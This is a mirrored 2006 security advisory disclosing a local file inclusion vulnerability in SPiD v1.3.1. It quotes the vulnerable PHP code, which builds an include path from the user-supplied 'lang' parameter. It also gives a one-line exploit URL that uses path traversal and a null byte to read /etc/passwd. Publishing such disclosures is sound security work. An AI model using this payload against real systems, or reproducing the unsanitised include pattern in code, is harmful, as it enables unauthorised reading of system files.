Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11600
HistoryFeb 26, 2006 - 12:00 a.m.

NSA Group Security Advisory NSAG-№201-25.02.2006 Vulnerability SPiD v1.3.1

2006-02-2600:00:00
vulners.com
14

Advisory:
NSAG-№201-25.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product:
SPiD v1.3.1

Site of manufacturer:
http://spid.adnx.net/

The status:
19/01/2006 - Publication is postponed.
14/02/2006 - Answer of the manufacturer is absent.
25/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/955.html

Risk:
Hide

Description:
Attacker can form the query in URL form ang get the access to the
system files.

Vulnerability code:
+++++++
if (isset($REQUEST["lang"])) {
$file_lang = $lang_path . "lang
" . $_REQUEST["lang"] . ".php"
if (file_exists($file_lang)) {
include $lang_path . "lang.php";
include $file_lang;

skip
+++++++

Exploit:
http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00

More information:
http://www.nsag.ru/vuln/955.html

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

www.nsag.ru
«Nemesis» © 2006

Nemesis Security Audit Group © 2006.